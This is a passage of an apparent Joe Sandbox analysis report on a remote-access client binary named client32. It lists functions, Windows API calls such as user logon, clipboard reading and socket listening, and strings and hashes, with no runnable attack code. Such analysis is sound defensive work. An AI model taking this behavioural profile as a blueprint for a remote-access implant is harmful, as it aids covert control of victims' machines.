                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorLastLibrary$ContextCryptFreeHandleLoadModuleRelease
                                                        • String ID: Advapi32.dll$AttemptLogon FAILED [status: 0x%08x]$CertAddCertificateContextToStore FAILED (%d)$CertGetCertificateContextProperty (1) failed (%d)$CertGetCertificateContextProperty (2) FAILED (%d)$CertGetCertificateContextProperty (3) FAILED (%d)$CredFree$CredMarshalCredentialA$CryptGetProvParam FAILED (%d)$LogonUserWithCert - Advapi32.dll does NOT provide required functionality!$LogonUserWithCert - CredMarshalCredential FAILED (%d)$LogonUserWithCert - Crypt32.dll NOT found!!!$LogonUserWithCert - Crypt32.dll does NOT provide required functionality!$LogonUserWithCert FAILED (%d) $\\.\%s\
                                                        • API String ID: 455412317-1640292549
                                                        • Opcode ID: 11c0ce5a15eb0ad978e2ce617f810eb73a51ac8ea6531c097df6ff3739c903a0
                                                        • Instruction ID: 14d655196b2d9980db4aac9cab0ede2ffb9987fd2d114c6750bd9b18e7e5f0cf
                                                        • Opcode Fuzzy Hash: 11c0ce5a15eb0ad978e2ce617f810eb73a51ac8ea6531c097df6ff3739c903a0
                                                        • Instruction Fuzzy Hash: EAE162B5D0022A9FDB20DF909CC4AEEB7B8BF44358F4441E9E919A3214E7315E84CF61
                                                        Function 11061140 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: #$$$$CLIENTNAME$$$PROMPT$$%03d%s$..\ctl32\Connect.cpp$.prn$op - obuf <= _tsizeof (obuf)
                                                        • API String ID: 2102423945-3087083064
                                                        • Opcode ID: 39b9b20f07d8f67a96a4a039c5d39d8e0a07284d7f924ca62ab7285e05a18b76
                                                        • Instruction ID: 9732641257c0b20e71b33c15b159d9766e9e212ca738346d0ff0b7fb1b6b53a2
                                                        • Opcode Fuzzy Hash: 39b9b20f07d8f67a96a4a039c5d39d8e0a07284d7f924ca62ab7285e05a18b76
                                                        • Instruction Fuzzy Hash: 5AA10775E002565FDB12CF64CC80BEEBBFDAF86308F1481D9D99AD7241DA31AA45CB90
                                                        Function 110CD1D0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 200networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110D37D0: EnterCriticalSection.KERNEL32(111D8C5C,11017228,82E0FB89,?,?,?,111B83A0,11175D28,000000FF,?,11019222), ref: 110D37D1
                                                        • __CxxThrowException@8.LIBCMT ref: 110CD253
                                                          • Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3
                                                          • Part of subcall function 110CCED0: __CxxThrowException@8.LIBCMT ref: 110CCF42
                                                          • Part of subcall function 110CCED0: getpeername.WSOCK32(?,?,00000000,82E0FB89), ref: 110CCF60
                                                          • Part of subcall function 11010AF0: _memmove.LIBCMT ref: 11010B2D
                                                        • gethostbyname.WSOCK32(0.0.0.0,82E0FB89,?,?,00000000), ref: 110CD265
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD271
                                                        • _memmove.LIBCMT ref: 110CD29B
                                                        • htons.WSOCK32(00000000), ref: 110CD2C1
                                                        • socket.WSOCK32(00000002,00000001,00000000), ref: 110CD2D5
                                                        • WSAGetLastError.WSOCK32 ref: 110CD2E3
                                                        • #21.WSOCK32(00000000,0000FFFF,00000004,?,00000004), ref: 110CD301
                                                        • bind.WSOCK32(?,?,00000010), ref: 110CD311
                                                        • WSAGetLastError.WSOCK32 ref: 110CD31C
                                                        • listen.WSOCK32(?,7FFFFFFF,82E0FB89,?,?,00000000), ref: 110CD338
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD343
                                                        • accept.WSOCK32(?,00000000,00000000,000000FF), ref: 110CD3A6
                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11174EAB), ref: 110CD3B4
                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(111D8BD0,000000FF,NsAppSystem::CNsAsException::CNsAsException,0000002B,111D8BD0,00000000,000000FF,82E0FB89,?,00000000,00000000,?,?,?,00000000,111761AB), ref: 110D5663
                                                          • Part of subcall function 110D55B0: OutputDebugStringA.KERNEL32(1118BEE8,?,?,?,00000000,111761AB,000000FF,?,110D2C63,?,Invalid Server paramters), ref: 110D566A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$DebugException@8OutputStringThrow_memmove$CriticalEnterExceptionRaiseSectionacceptbindgethostbynamegetpeernamehtonslistensocket
                                                        • String ID: 0.0.0.0$Listen() the socket is not closed
                                                        • API String ID: 1096978048-1307932746
                                                        • Opcode ID: a730248214e9a563b59b10436eac38ba2d44abaab5b0afecdef3ac821dfa7065
                                                        • Instruction ID: 956b2696774708f28c41c5c40744a434557477a21071a8e5edb7c5ae032104a2
                                                        • Opcode Fuzzy Hash: a730248214e9a563b59b10436eac38ba2d44abaab5b0afecdef3ac821dfa7065
                                                        • Instruction Fuzzy Hash: 0461A5B5E00606AFDB14DFE4C980B9EF7B5AF48B24F108659E526E72C0DB74A5018FA1
                                                        Function 11039030 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _calloc.LIBCMT ref: 11039116
                                                        • _free.LIBCMT ref: 11039210
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                          • Part of subcall function 110C3E90: FindResourceExA.KERNEL32(00000000,00000005,?,00000000), ref: 110C3F15
                                                          • Part of subcall function 110C3E90: LoadResource.KERNEL32(00000000,00000000), ref: 110C3F44
                                                          • Part of subcall function 110C3E90: LockResource.KERNEL32(00000000), ref: 110C3F68
                                                          • Part of subcall function 110C3E90: CreateDialogIndirectParamA.USER32(00000000,00000000,1111EF19,110C2640,00000000), ref: 110C3F99
                                                          • Part of subcall function 110C3E90: CreateDialogIndirectParamA.USER32(00000000,00000000,1111EF19,110C2640,00000000), ref: 110C3FB4
                                                          • Part of subcall function 110C3E90: GetLastError.KERNEL32 ref: 110C3FD9
                                                        • _calloc.LIBCMT ref: 11039225
                                                        • _free.LIBCMT ref: 11039260
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Resource$CreateDialogIndirectParam_calloc_free$ErrorFindLastLoadLock_malloc_memsetwsprintf
                                                        • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                        • API String ID: 2195741704-1552251038
                                                        • Opcode ID: 5ae14f198104c464671bab3f216baa493da83b8bef8af5054f289781c9ff8bbe
                                                        • Instruction ID: 53a8b38fcb329f41cef8c2a65a5fb3865c4ab55a76465e48db301f8623a07c24
                                                        • Opcode Fuzzy Hash: 5ae14f198104c464671bab3f216baa493da83b8bef8af5054f289781c9ff8bbe
                                                        • Instruction Fuzzy Hash: 1E61F475E54611AFD740EFA0DCC5FDAF3A4AF8471DF104268E9296B2C0EBB16940CB92
                                                        Function 110ED2B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 173librarywindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,1105649A), ref: 110ED2F4
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,1105649A), ref: 110ED336
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 110ED351
                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,1105649A), ref: 110ED38D
                                                        • GetLastError.KERNEL32(?,1105649A), ref: 110ED398
                                                        • FormatMessageA.KERNEL32(00000900,?,?,00000000,?,00000000,?,00000000,?,1105649A), ref: 110ED3DD
                                                        • LocalFree.KERNEL32(?,?,1105649A), ref: 110ED45C
                                                        • _memmove.LIBCMT ref: 110ED48D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$DirectoryErrorFileFormatFreeLastLocalMessageModuleNameSystem_memmove_strrchr
                                                        • String ID: %s (%d)$??? $Cannot find message %d$Cannot open file %s, error %d$\PCImsg.dll
                                                        • API String ID: 3675426511-2756047042
                                                        • Opcode ID: 24b43653ea149b7fc03000e038b4f402e07b261599e85d7f4999701ef2a47801
                                                        • Instruction ID: ced640a395ebe727b00206b968de0e8db358c6ace47da34f22fb5d2595477f7d
                                                        • Opcode Fuzzy Hash: 24b43653ea149b7fc03000e038b4f402e07b261599e85d7f4999701ef2a47801
                                                        • Instruction Fuzzy Hash: EB5119B5E0021AAFD704CF79DC89FDEF7B8EB59308F0480A9E955D7240EA71A9448B91
                                                        Function 1114D430 Relevance: 17.9, APIs: 8, Strings: 2, Instructions: 440COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowLongA.USER32(?,000000FC,?), ref: 1114D476
                                                        • RemovePropA.USER32(?), ref: 1114D495
                                                        • RemovePropA.USER32(?), ref: 1114D4A4
                                                        • RemovePropA.USER32(?,00000000), ref: 1114D4B3
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        • CallWindowProcA.USER32(?,?,?,?,?), ref: 1114D80A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                        • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                        • API String ID: 1777853711-3305400014
                                                        • Opcode ID: 1b3096391e9100c0dff8ec288cab940e3f3d68445cee506a92fe49f2f52b3cec
                                                        • Instruction ID: a9ca4b3d29b6757e08e08d1351ada2b625a191a468bc1592360ff9c51f34a9c8
                                                        • Opcode Fuzzy Hash: 1b3096391e9100c0dff8ec288cab940e3f3d68445cee506a92fe49f2f52b3cec
                                                        • Instruction Fuzzy Hash: CAC15DB63040199FDB08CE69E894E7FB3E9EBC8711B50466EF946C7781DA31AC1187B1
                                                        Function 11023040 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 231windowthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        • RDH::Dialog already created so restore, xrefs: 1102322C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window_memset_strncpy$BringCurrentIconicThread
                                                        • String ID: RDH::Dialog already created so restore
                                                        • API String ID: 2558468902-3779292929
                                                        • Opcode ID: 1b6332f507f83461602a68dd11a8f54dcfe15ffaf1a6ecce51fca5189bdcfe15
                                                        • Instruction ID: 9fb44cbcd3b538895b0def4521801f9bfde370520260cf145bbd00386ee71607
                                                        • Opcode Fuzzy Hash: 1b6332f507f83461602a68dd11a8f54dcfe15ffaf1a6ecce51fca5189bdcfe15
                                                        • Instruction Fuzzy Hash: 5591A175E046099FDB00CFA9C884BEEBBF5BF89308F548569E8159B381DB74A944CF90
                                                        Function 11031430 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 312COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                        • API String ID: 0-293745777
                                                        • Opcode ID: 127b5213422b15e425346da24cd16221a59b034f56f518ca3ab0e2a8f7d037f5
                                                        • Instruction ID: 6deb9f8abc6a4cad7d773f1ab5b5bd319d2f4c8d3dcf5da947e35b6bef66306d
                                                        • Opcode Fuzzy Hash: 127b5213422b15e425346da24cd16221a59b034f56f518ca3ab0e2a8f7d037f5
                                                        • Instruction Fuzzy Hash: 04A1D275F102059FD710DBA4DC80FAAB3B5AFDD319F144199EA4A9B280EB71F940CB91
                                                        Function 110E9400 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 110E940F
                                                        • LogonUserA.ADVAPI32(?,00000000,?,?,?,FFFFFFFF), ref: 110E94BE
                                                        • GetTickCount.KERNEL32 ref: 110E94C6
                                                        • GetLastError.KERNEL32 ref: 110E94FE
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountErrorLastTick$ExitLogonMessageProcessUserwsprintf
                                                        • String ID: IsA()$LogonUser(%s, %s) took %d ms, ret %d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$null
                                                        • API String ID: 307273675-931856353
                                                        • Opcode ID: 542ecd84b7764c589124868231b19b0268137c9ef5a69bea329ee57c5c71da03
                                                        • Instruction ID: f479a602a004497ae36e32c9422561ea4b7ba1cfc2dda626e9e37eed398c0a62
                                                        • Opcode Fuzzy Hash: 542ecd84b7764c589124868231b19b0268137c9ef5a69bea329ee57c5c71da03
                                                        • Instruction Fuzzy Hash: 4431A2B9A00A06AFC720DF56DC88E9AF7F9FF88314B108258E81593751EB30F905CB60
                                                        Function 11031080 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsClipboardFormatAvailable.USER32(?), ref: 110310C1
                                                        • GetClipboardData.USER32(?), ref: 110310DD
                                                        • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 1103115C
                                                        • GetLastError.KERNEL32 ref: 11031166
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 11031186
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                        • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                        • API String ID: 1861668072-1296821031
                                                        • Opcode ID: 72918964a1369d3bb2368425b4338c3315936ac85280862e7e4cd8f3fdf3f6c4
                                                        • Instruction ID: 3a2d50e1deb99135114f4ad4be661bc5fe19da930bc3f706a95416d91adfb30e
                                                        • Opcode Fuzzy Hash: 72918964a1369d3bb2368425b4338c3315936ac85280862e7e4cd8f3fdf3f6c4
                                                        • Instruction Fuzzy Hash: 0D21A136F1015A9FD701DFE598819FEF7FDEF8D319B1040AAE815D7204EA3199008B90
                                                        Function 110B7590 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsIconic.USER32(000000FF), ref: 110B761D
                                                        • ShowWindow.USER32(000000FF,00000009,?,110594F3,00000001,00000001,?,00000000), ref: 110B762D
                                                        • BringWindowToTop.USER32(000000FF), ref: 110B7637
                                                        • GetCurrentThreadId.KERNEL32 ref: 110B7658
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
